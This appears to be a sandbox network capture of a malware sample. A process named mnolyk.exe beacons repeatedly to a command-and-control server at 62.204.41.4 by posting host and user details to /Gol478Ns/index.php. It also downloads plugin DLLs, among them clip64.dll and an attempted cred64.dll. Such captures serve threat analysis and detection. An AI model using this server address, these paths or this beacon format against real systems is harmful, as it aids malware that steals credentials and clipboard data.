                                                                    Feb 8, 2023 21:33:58.327742100 CET5025280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:58.330033064 CET805025362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:58.330287933 CET5025380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:58.330621958 CET5025380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:58.392395973 CET805025362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:58.394375086 CET805025362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:58.397439957 CET5025380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:58.501398087 CET5025380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:58.502500057 CET5025480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:58.563518047 CET805025362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:58.563776970 CET5025380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:58.564295053 CET805025462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:58.564475060 CET5025480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:58.565095901 CET5025480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:58.626837015 CET805025462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:58.629164934 CET805025462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:58.629338026 CET5025480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:58.769901037 CET5025480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:58.770550966 CET5025580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:58.831968069 CET805025562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:58.832016945 CET805025462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:58.832173109 CET5025480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:58.832472086 CET5025580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:58.840938091 CET5025580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:58.902415037 CET805025562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:58.905013084 CET805025562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:58.905159950 CET5025580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.015875101 CET5025580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.016932011 CET5025680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.077462912 CET805025562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.077708006 CET5025580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.078558922 CET805025662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.078669071 CET5025680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.079103947 CET5025680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.140970945 CET805025662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.144504070 CET805025662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.144690037 CET5025680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.249646902 CET5025680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.250598907 CET5025780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.311779022 CET805025662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.311973095 CET5025680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.312851906 CET805025762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.313064098 CET5025780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.313801050 CET5025780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.376164913 CET805025762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.379992962 CET805025762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.380162001 CET5025780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.484143972 CET5025780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.484843016 CET5025880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.546614885 CET805025762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.546649933 CET805025862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.546725035 CET5025780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.546803951 CET5025880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.548026085 CET5025880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.609571934 CET805025862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.612236977 CET805025862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.612359047 CET5025880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.718904018 CET5025880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.719822884 CET5025980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.780559063 CET805025962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.780688047 CET805025862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.780744076 CET5025980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.780812025 CET5025880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.785012007 CET5025980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.845988035 CET805025962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.849739075 CET805025962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.849888086 CET5025980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.970029116 CET5025980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.972332001 CET5026080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.031013012 CET805025962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.031177044 CET5025980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.034914970 CET805026062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.035084963 CET5026080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.035520077 CET5026080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.098100901 CET805026062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.102188110 CET805026062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.102360010 CET5026080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.221556902 CET5026080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.222323895 CET5026180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.284081936 CET805026162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.284317970 CET5026180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.284351110 CET805026062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.284487963 CET5026080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.284821987 CET5026180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.346343040 CET805026162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.348800898 CET805026162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.348893881 CET5026180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.454627991 CET5026180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.455971956 CET5026280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.516484022 CET805026262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.516542912 CET805026162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.516654015 CET5026280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.516685009 CET5026180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.517158031 CET5026280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.577464104 CET805026262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.579685926 CET805026262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.579924107 CET5026280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.688436985 CET5026280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.689277887 CET5026380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.749222994 CET805026262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.749422073 CET5026280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.750042915 CET805026362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.750235081 CET5026380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.750617981 CET5026380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.811212063 CET805026362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.814040899 CET805026362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.817823887 CET5026380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.924040079 CET5026380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.924753904 CET5026480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.014820099 CET805026362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.014883995 CET805026462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.014987946 CET5026380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.015032053 CET5026480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.016917944 CET5026480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.079509020 CET805026462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.083281040 CET805026462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.086441994 CET5026480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.205180883 CET5026480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.206147909 CET5026580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.268182039 CET805026462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.268223047 CET805026562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.268330097 CET5026480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.268426895 CET5026580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.268881083 CET5026580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.330631971 CET805026562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.334364891 CET805026562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.334582090 CET5026580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.438787937 CET5026580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.440460920 CET5026680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.500756979 CET805026562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.501005888 CET5026580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.503062963 CET805026662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.503264904 CET5026680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.503734112 CET5026680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.567120075 CET805026662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.570391893 CET805026662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.573717117 CET5026680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.691267967 CET5026680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.692341089 CET5026780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.752964973 CET805026762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.753143072 CET5026780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.753798962 CET805026662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.753972054 CET5026680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.755474091 CET5026780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.815995932 CET805026762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.818662882 CET805026762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.818897009 CET5026780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.937041044 CET5026780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.938010931 CET5026880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.997987986 CET805026762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.998179913 CET5026780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.999682903 CET805026862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.999854088 CET5026880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.000197887 CET5026880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.061835051 CET805026862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.066241980 CET805026862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.066473961 CET5026880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.172059059 CET5026880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.174559116 CET5026980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.234019995 CET805026862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.234297991 CET5026880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.235013962 CET805026962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.235129118 CET5026980192.168.2.362.204.41.4
                                                                    • 62.204.41.4
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49702 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:31:09.595885992 CET | 105 | OUT | GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1
                                                                    Host: 62.204.41.4
Feb 8, 2023 21:31:09.656357050 CET | 106 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:09 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 162
                                                                    Connection: keep-alive
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49701 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:31:09.596329927 CET | 105 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:31:09.661412954 CET | 106 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0
Feb 8, 2023 21:31:09.718036890 CET | 106 | OUT | GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1
                                                                    Host: 62.204.41.4
Feb 8, 2023 21:31:09.779712915 CET | 108 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:09 GMT
                                                                    Content-Type: application/octet-stream
                                                                    Content-Length: 91136
                                                                    Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT
                                                                    Connection: keep-alive
                                                                    ETag: "63dd4219-16400"
                                                                    Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49711 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 8, 2023 21:31:11.882853985 CET | 210 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
Feb 8, 2023 21:31:11.944474936 CET | 211 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 100
                                                                    Source IP: 192.168.2.3
                                                                    Source Port: 49802
                                                                    Destination IP: 62.204.41.4
                                                                    Destination Port: 80
                                                                    Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:44.378401995 CET
                                                                    kBytes transferred: 301
                                                                    Direction: OUT
                                                                    Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:44.442873955 CET
                                                                    kBytes transferred: 301
                                                                    Direction: IN
                                                                    Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 101
                                                                    Source IP: 192.168.2.3
                                                                    Source Port: 49803
                                                                    Destination IP: 62.204.41.4
                                                                    Destination Port: 80
                                                                    Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:44.620667934 CET
                                                                    kBytes transferred: 302
                                                                    Direction: OUT
                                                                    Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:44.683964014 CET
                                                                    kBytes transferred: 302
                                                                    Direction: IN
                                                                    Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 102
                                                                    Source IP: 192.168.2.3
                                                                    Source Port: 49804
                                                                    Destination IP: 62.204.41.4
                                                                    Destination Port: 80
                                                                    Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:44.855990887 CET
                                                                    kBytes transferred: 303
                                                                    Direction: OUT
                                                                    Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:44.919894934 CET
                                                                    kBytes transferred: 303
                                                                    Direction: IN
                                                                    Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 103
                                                                    Source IP: 192.168.2.3
                                                                    Source Port: 49805
                                                                    Destination IP: 62.204.41.4
                                                                    Destination Port: 80
                                                                    Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:45.092452049 CET
                                                                    kBytes transferred: 304
                                                                    Direction: OUT
                                                                    Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:45.155440092 CET
                                                                    kBytes transferred: 304
                                                                    Direction: IN
                                                                    Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 104
                                                                    Source IP: 192.168.2.3
                                                                    Source Port: 49806
                                                                    Destination IP: 62.204.41.4
                                                                    Destination Port: 80
                                                                    Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:45.331321001 CET
                                                                    kBytes transferred: 305
                                                                    Direction: OUT
                                                                    Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:45.396585941 CET
                                                                    kBytes transferred: 305
                                                                    Direction: IN
                                                                    Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID: 105
                                                                    Source IP: 192.168.2.3
                                                                    Source Port: 49807
                                                                    Destination IP: 62.204.41.4
                                                                    Destination Port: 80
                                                                    Process: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp: Feb 8, 2023 21:31:45.583488941 CET
                                                                    kBytes transferred: 306
                                                                    Direction: OUT
                                                                    Data:
                                                                    POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Timestamp: Feb 8, 2023 21:31:45.648488998 CET
                                                                    kBytes transferred: 306
                                                                    Direction: IN
                                                                    Data:
                                                                    HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
